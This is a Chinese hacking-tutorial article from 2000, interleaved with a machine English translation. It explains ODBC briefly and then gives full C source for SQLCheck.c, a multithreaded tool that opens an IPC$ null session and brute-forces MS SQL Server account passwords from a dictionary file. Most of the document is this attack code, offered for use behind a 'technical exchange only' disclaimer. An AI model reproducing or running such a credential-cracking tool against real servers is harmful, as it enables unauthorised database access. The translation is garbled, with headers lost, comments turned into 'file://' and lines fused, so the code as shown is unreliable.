远程检测MS SQL Server账号安全性 Remote detection of MS SQL Server security account

eyas eyas

ODBC是开放数据互连(Open Database ODBC is Open Data Interconnection (Open Database
Connectivity)的简称，它是一个用于远程访问数据库（主要是关系型数据库）的统一界面标准。 Connectivity) for short, is a database for remote access (mainly relational database) is a unified interface standard. ODBC下现实运用中是一个数据库的访问库，它提供了一组ODBC ODBC is the next actual use of a database access library, which provides a set of ODBC
API函数可以提供给编程者使用。 API functions can be provided to the programmer to use. 对于程序员来说，ODBC For programmers, ODBC
API函数集实际上等于一个动态连接库(DLL)集，可以在应用程序中直接使用它们。 API function set is actually equal to a dynamic link library (DLL) set directly in the application can use them.

一个应用程序直接调用ODBC API函数来进行数据库的应用工作，工作过程一般比较复杂。 An application to directly call the ODBC API functions for database applications work, work process is generally more complex. 其中一种办法大概是以下几步： One approach is probably the following steps:
<1>启动ODBC数据库应用程序。 <1> Start the ODBC database applications.
<2>与服务器建立IPC SESSION。 <2> and server to establish IPC SESSION.
<3>创建数据库应用的环境句柄。 <3> create a database application environment handle.
<4>创建连接句柄。 <4> to create a connection handle.
<5>连接数据源。 <5> to connect the data source.
<6>创建语句句柄。 <6> Create statement handle.
<7>通过上一步创建的语句句柄来执行SQL操作。 <7> by the previous step to create a statement handle to execute the SQL operations.
<8>释放语句句柄。 <8> free the statement handle.
<9>要进行多此SQL操作的话，就循环步骤6-8。 <9> to be more of this SQL operation, then the cycle steps 6-8.
<10>断开与数据库的连接。 <10> Disconnect from the database.
<11>释放连接句柄。 <11> release the connection handle.
<12>释放环境句柄。 <12> release the environment handle.
<13>断开IPC SESSION。 <13> Disconnect IPC SESSION.
<14>程序结束。 <14> end of the process.

下面以一个实例来说明远程检测MS SQL Server账号密码的全过程。 Below an example to illustrate the remote detection of MS SQL Server account password of the whole process. 此程序只作技术交流之用，如用于不法用途，作者不负任何责任！ This program is only for technical exchange purposes, such as for illegal purposes, the author assumes no responsibility!

/********************************************************** /************************************************* *********
Module Name:SQLCheck.c Module Name: SQLCheck.c
Date:2000.12.14 Date: 2000.12.14
WEB:www.patching.net WEB: www.patching.net
Notices:Copyright(c) eyas Notices: Copyright (c) eyas
**********************************************************/ ************************************************** ********/
#include # Include
#include # Include
#include # Include
#include # Include
#include # Include
#include # Include
#include # Include
#include # Include

//////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////// //////////////////////
file://定义全局变量 file: / / define global variables
char dict[20000][40],//密码字典 char dict [20000] [40], / / ​​password dictionary
UserName[40],//用户名 UserName [40], / / ​​user name
target[40],//目标服务器 target [40], / / ​​the target server
passwd[40];//已经探测出来的正确密码 passwd [40]; / / out of the correct password has been detected
int total=0;//字典里面单词数量 int total = 0; / / number of words in the dictionary
BOOL Cracked=FALSE;//探测密码成功时此值为TRUE BOOL Cracked = FALSE; / / detect when this is TRUE password successfully
HANDLE hSemaphore,//信标内核对象 HANDLE hSemaphore, / / ​​Beacon kernel objects
hEvent;//事件内核对象 hEvent; / / event kernel object
long MaxThreads,//最大线程数量 long MaxThreads, / / ​​maximum number of threads
ActiveThreads;//活动线程数量 ActiveThreads; / / the number of active threads
//////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////// //////////////////////
void usage(char *pragname) void usage (char * pragname)
{ {
printf("\nPower by eyas" printf ("\ nPower by eyas"
"\nhttp://www.patching.net" "\ Nhttp: / / www.patching.net"
"\n2000/12/14" "\ N2000/12/14"
"\n\nUsage:%s " "\ N \ nUsage:% s"
"\nExample:%s 192.168.0.1 sa c:\\pwd.dic 50\n",pragname,pragname); "\ NExample:% s 192.168.0.1 sa c: \ \ pwd.dic 50 \ n", pragname, pragname);
return; return;
} }

//////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////// //////////////////////
int ReadDic(char *dic) int ReadDic (char * dic)
{ {
FILE *fp; FILE * fp;
char tmp[40]; char tmp [40];

file://打开字典文件 file: / / open the dictionary file
if((fp=fopen(dic,"r"))==NULL) if ((fp = fopen (dic, "r "))== NULL)
{ {
printf("\nCan't open %s",dic); printf ("\ nCan't open% s", dic);
return 1; return 1;
} }

while(!feof(fp)) while (! feof (fp))
{ {
file://读取数据到临时变量 file: / / read data to a temporary variable
if(fgets(tmp,40,fp)==NULL) if (fgets (tmp, 40, fp) == NULL)
break; break;
file://把从文件里面读出来的最后一位数据[换行符号]去掉 file: / / to read from the file inside the data out of the last [line break] to remove
strncpy(dict[total],tmp,strlen(tmp)-1); strncpy (dict [total], tmp, strlen (tmp) -1);
total++; total + +;
if(total>=19999) if (total> = 19999)
break; break;
} }
fclose(fp); fclose (fp);
return 0; return 0;
} }
//////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////// //////////////////////
int ConnIPC(char *RemoteName) int ConnIPC (char * RemoteName)
{ {
NETRESOURCE nr; NETRESOURCE nr;
DWORD flags=CONNECT_UPDATE_PROFILE; DWORD flags = CONNECT_UPDATE_PROFILE;
TCHAR RN[30]="\\\\", TCHAR RN [30] = "\ \ \ \",
LN[5]=""; LN [5 ]="";

strcat(RN,RemoteName); strcat (RN, RemoteName);
strcat(RN,"\\ipc$"); strcat (RN, "\ \ ipc $");

nr.dwType=RESOURCETYPE_DISK; nr.dwType = RESOURCETYPE_DISK;
nr.lpLocalName=(LPTSTR)&LN; nr.lpLocalName = (LPTSTR) &LN;
nr.lpRemoteName=(LPTSTR)&RN; nr.lpRemoteName = (LPTSTR) &RN;
nr.lpProvider=NULL; nr.lpProvider = NULL;

if(WNetAddConnection2(&nr,(LPSTR)"",(LPSTR)"",flags)==NO_ERROR) if (WNetAddConnection2 (& nr, (LPSTR )"",( LPSTR) "", flags) == NO_ERROR)
{ {
return 0; return 0;
} }
else else
{ {
return 1; return 1;
} }
} }
//////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////// //////////////////////

int DelIPC(char *RemoteName) int DelIPC (char * RemoteName)
{ {
DWORD ret; DWORD ret;
TCHAR lpName[30]="\\\\"; TCHAR lpName [30] = "\ \ \ \";

strcat(lpName,RemoteName); strcat (lpName, RemoteName);
strcat(lpName,"\\ipc$"); strcat (lpName, "\ \ ipc $");

ret=WNetCancelConnection2(lpName,CONNECT_UPDATE_PROFILE,TRUE); ret = WNetCancelConnection2 (lpName, CONNECT_UPDATE_PROFILE, TRUE);
if(ret==NO_ERROR) if (ret == NO_ERROR)
{ {
return 0; return 0;
} }
else else
{ {
return 1; return 1;
} }
} }
//////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////// //////////////////////
DWORD WINAPI SQLCheck(PVOID pPwd) DWORD WINAPI SQLCheck (PVOID pPwd)
{ {
file://定义局部变量 file: / / define the local variables
char szBuffer[1025]; char szBuffer [1025];
char *pwd; char * pwd;
SWORD swStrLen; SWORD swStrLen;
SQLHDBC hdbc; SQLHDBC hdbc;
SQLHANDLE henv; SQLHANDLE henv;
SQLRETURN retcode;//ODBC API运行返回值 SQLRETURN retcode; / / ODBC API return value of running
SCHAR ConnStr[200];//连接数据库字符串 SCHAR ConnStr [200]; / / connect to the database string
long PreviousCount; long PreviousCount;

file://取得传递过来准备探测的密码 file: / / get ready to pass over the detection of password
pwd=(char *)pPwd; pwd = (char *) pPwd;
file://构造连接数据库字符 file: / / connect to the database character structure
sprintf(ConnStr,"DRIVER={SQL sprintf (ConnStr, "DRIVER = {SQL
Server};SERVER=%s;UID=%s;PWD=%s;DATABASE=master", Server}; SERVER =% s; UID =% s; PWD =% s; DATABASE = master ",
target,UserName,pwd); target, UserName, pwd);
file://puts(ConnStr); file: / / puts (ConnStr);
__try{ __try {
file://创建数据库应用的环境句柄 file: / / handle to create a database application environment
if (SQLAllocHandle(SQL_HANDLE_ENV,SQL_NULL_HANDLE,&henv) if (SQLAllocHandle (SQL_HANDLE_ENV, SQL_NULL_HANDLE, & henv)
!=SQL_SUCCESS) ! = SQL_SUCCESS)
{ {
printf("\nAllocate environment handle failed.\n"); printf ("\ nAllocate environment handle failed. \ n");
ExitProcess(1); ExitProcess (1);
} }
file://设置ODBC版本环境 file: / / Set the ODBC version environment
if (SQLSetEnvAttr(henv, SQL_ATTR_ODBC_VERSION,(SQLPOINTER) if (SQLSetEnvAttr (henv, SQL_ATTR_ODBC_VERSION, (SQLPOINTER)
SQL_OV_ODBC3, SQL_IS_INTEGER) != SQL_SUCCESS) SQL_OV_ODBC3, SQL_IS_INTEGER)! = SQL_SUCCESS)
{ {
printf("\nSet the ODBC version environment attribute failed.\n"); printf ("\ nSet the ODBC version environment attribute failed. \ n");
SQLFreeHandle(SQL_HANDLE_ENV, henv); SQLFreeHandle (SQL_HANDLE_ENV, henv);
ExitProcess(1); ExitProcess (1);
} }
file://创建连接句柄 file: / / create a connection handle
if ((retcode= SQLAllocHandle(SQL_HANDLE_DBC,henv,(SQLHDBC FAR if ((retcode = SQLAllocHandle (SQL_HANDLE_DBC, henv, (SQLHDBC FAR
*)&hdbc)) != SQL_SUCCESS) *) & Hdbc))! = SQL_SUCCESS)
{ {
printf("\nAllocate connection handle failed.\n"); printf ("\ nAllocate connection handle failed. \ n");
SQLFreeHandle(SQL_HANDLE_ENV, henv); SQLFreeHandle (SQL_HANDLE_ENV, henv);
ExitProcess(1); ExitProcess (1);
} }
file://连接数据源 file: / / connect to data sources
retcode= SQLDriverConnect(hdbc,NULL,ConnStr,strlen(ConnStr), retcode = SQLDriverConnect (hdbc, NULL, ConnStr, strlen (ConnStr),
szBuffer,sizeof(szBuffer),&swStrLen, szBuffer, sizeof (szBuffer), & swStrLen,
SQL_DRIVER_COMPLETE_REQUIRED); SQL_DRIVER_COMPLETE_REQUIRED);
if(retcode!=SQL_SUCCESS && retcode != SQL_SUCCESS_WITH_INFO) if (retcode! = SQL_SUCCESS & & retcode! = SQL_SUCCESS_WITH_INFO)
{ {
file://连接失败，函数终止 file: / / connection fails, the function terminates
file://printf("\nCouldn't connect to %s MSSQL server.\n",target); file: / / printf ("\ nCouldn't connect to% s MSSQL server. \ n", target);
} }
else else
{ {
file://连接远程MSSQL Server数据库成功 file: / / connect to a remote MSSQL Server database successfully
Cracked=TRUE; Cracked = TRUE;
strncpy(passwd,pwd,sizeof(passwd)); strncpy (passwd, pwd, sizeof (passwd));
file://断开连接 file: / / disconnect
SQLDisconnect(hdbc); SQLDisconnect (hdbc);
} }
}//end of tyr } / / End of tyr
__finally{ __finally {
file://释放连接句柄 file: / / release the connection handle

SQLFreeHandle(SQL_HANDLE_DBC, hdbc); SQLFreeHandle (SQL_HANDLE_DBC, hdbc);
file://释放环境句柄 file: / / free the environment handle
SQLFreeHandle(SQL_HANDLE_ENV, henv); SQLFreeHandle (SQL_HANDLE_ENV, henv);
file://对信标当前资源数量进行递增1，并取得当前资源数量的原始值 file: / / Beacon current resources for increasing the number of 1, and obtain the original value of the current number of resources
ReleaseSemaphore(hSemaphore,1,&PreviousCount); ReleaseSemaphore (hSemaphore, 1, & PreviousCount);
file://计算当前活动线程数量 file: / / calculate the number of currently active threads
ActiveThreads=MaxThreads-PreviousCount-1; ActiveThreads = MaxThreads-PreviousCount-1;
file://printf("\nActiveThreads-->%d.",ActiveThreads); file: / / printf ("\ nActiveThreads ->% d.", ActiveThreads);
file://如果活动线程数量为0,那么将事件内核对象hEvent改为已通知状态，程序结束 file: / / If the number of active threads is 0, then the event kernel object hEvent to have been notified, and the program ends
if(ActiveThreads==0) if (ActiveThreads == 0)
{ {
SetEvent(hEvent); SetEvent (hEvent);
} }
}//end of finally } / / End of finally
return 0; return 0;
} }

//////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////// //////////////////////
int main(int argc,char **argv) int main (int argc, char ** argv)
{ {
HANDLE hThread;//线程句柄 HANDLE hThread; / / thread handle
DWORD dwThreadId,dwRet; DWORD dwThreadId, dwRet;
int i=0,err=0; int i = 0, err = 0;
clock_t start,end;//程序运行的起始和结束时间 clock_t start, end; / / run the start and end time
double duration; double duration;

if(argc!=5) if (argc! = 5)
{ {
usage(argv[0]); usage (argv [0]);
return 1; return 1;
} }
file://取得目标地址，用户名 file: / / get the target address, user name
strncpy(target,argv[1],sizeof(target)); strncpy (target, argv [1], sizeof (target));
strncpy(UserName,argv[2],sizeof(UserName)); strncpy (UserName, argv [2], sizeof (UserName));
file://取得并检查用户输入的最大线程数量 file: / / get user input and check the maximum number of threads
MaxThreads=atol(argv[4]); MaxThreads = atol (argv [4]);
if((MaxThreads>100) || (MaxThreads<1)) if ((MaxThreads> 100) | | (MaxThreads <1)) { { usage(argv[0]); usage (argv [0]); return 1; return 1; } } file://读取字典中的单词到内存中 file: / / read the word in the dictionary into memory if(ReadDic(argv[3])!=0) if (ReadDic (argv [3])! = 0) return 1; return 1; file://与目标机器建立IPC Session file: / / IPC Session established with the target machine if(ConnIPC(argv[1])!=0) if (ConnIPC (argv [1])! = 0) { { printf("\nCan't built IPC NULL Session!"); printf ("\ nCan't built IPC NULL Session!"); return 1; return 1; } } else else { { printf("\nBuilt IPC NULL Session success!\n"); printf ("\ nBuilt IPC NULL Session success! \ n"); } } file://创建信标内核对象,最大资源数量和可以使用的资源数量均为MaxThreads file: / / create a beacon kernel objects, you can use the maximum amount of resources and the amount of resources are MaxThreads hSemaphore=CreateSemaphore(NULL,MaxThreads,MaxThreads,NULL); hSemaphore = CreateSemaphore (NULL, MaxThreads, MaxThreads, NULL); if(hSemaphore==NULL) if (hSemaphore == NULL) { { printf("\nCreateSemaphore() failed.ErrorCode:%d.",GetLastError()); printf ("\ nCreateSemaphore () failed.ErrorCode:% d.", GetLastError ()); return 1; return 1; } } file://创建事件内核对象[人工重置，初始状态为未通知] file: / / create an event kernel object [manual reset, the initial state without notice] hEvent=CreateEvent(NULL,TRUE,FALSE,NULL); hEvent = CreateEvent (NULL, TRUE, FALSE, NULL); if(hEvent==NULL) if (hEvent == NULL) { { printf("\nCreateEvent() failed.ErrorCode:%d.",GetLastError()); printf ("\ nCreateEvent () failed.ErrorCode:% d.", GetLastError ()); CloseHandle(hSemaphore); CloseHandle (hSemaphore); return 1; return 1; } } file://开始计时 file: / / start time start=clock(); start = clock (); file://开始建立线程探测密码 file: / / Password to start building thread detection for(i=0;i { for (i = 0; i { file://探测密码成功后跳出此循环 file: / / detect the password out of this cycle of success if(Cracked==TRUE) if (Cracked == TRUE) break; break; file://显示进度信息 file: / / display progress information printf("\n[%d/%d] %s -> %s -> printf ("\ n [% d /% d]% s ->% s ->
%s",i+1,total,target,UserName,dict[i]); % S ", i +1, total, target, UserName, dict [i]);
file://创建线程 file: / / create thread
hThread=CreateThread(NULL,0,SQLCheck,(PVOID)&dict[i],0,&dwThreadId); hThread = CreateThread (NULL, 0, SQLCheck, (PVOID) & dict [i], 0, & dwThreadId);
file://处理创建线程错误的情况 file: / / create a thread handle error conditions
if(hThread==NULL) if (hThread == NULL)

{ {
err++; err + +;
MessageBox(NULL,"thread error","error",MB_OK); MessageBox (NULL, "thread error", "error", MB_OK);
if(err>=50) if (err> = 50)
break; break;
} }
CloseHandle(hThread); CloseHandle (hThread);
Sleep(10); Sleep (10);
file://等待信标内核对象通知，可用资源数量大于0则继续创建线程，等于0则线程进入等待状态 file: / / wait for notification beacon kernel objects, greater than 0 the number of available resources to create a thread, is equal to 0, the thread enters a wait state
WaitForSingleObject(hSemaphore,INFINITE); WaitForSingleObject (hSemaphore, INFINITE);
} }
file://等待事件内核对象通知,最多等待3分钟 file: / / wait for event notification kernel object, wait up to three minutes
dwRet=WaitForSingleObject(hEvent,180000); dwRet = WaitForSingleObject (hEvent, 180000);
switch(dwRet) switch (dwRet)
{ {
case WAIT_OBJECT_0: case WAIT_OBJECT_0:
printf("\nAll thread done."); printf ("\ nAll thread done.");
break; break;
case WAIT_TIMEOUT: case WAIT_TIMEOUT:
printf("\nWait time out.Exit."); printf ("\ nWait time out.Exit.");
break; break;
case WAIT_FAILED: case WAIT_FAILED:
printf("\nWaitForSingleObject() failed."); printf ("\ nWaitForSingleObject () failed.");
break; break;
} }
file://断开与目标机器的IPC Session file: / / disconnect with the target machine's IPC Session
DelIPC(target); DelIPC (target);
file://探测密码成功后回显信息 file: / / password successfully detect the echo
if(Cracked==TRUE) if (Cracked == TRUE)
printf("\n\nSuccess!%s SQL Server User [%s] passwd is printf ("\ n \ nSuccess!% s SQL Server User [% s] passwd is
[%s].",target,UserName,passwd); [% S]. ", Target, UserName, passwd);
file://记时结束 file: / / when the end in mind
end=clock(); end = clock ();
file://转换时间格式 file: / / time format conversion
duration = (double)(end - start) / CLOCKS_PER_SEC; duration = (double) (end - start) / CLOCKS_PER_SEC;
file://显示所用时间 file: / / display the time spent
printf("\n\nComplete.Use %2.1f seconds.\n",duration); printf ("\ n \ nComplete.Use% 2.1f seconds. \ n", duration);
return 0; return 0;
} }
//////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////// //////////////////////
程序在windows2000,vc++6.0环境下编译通过。 Program in windows2000, vc + +6.0 environment compile.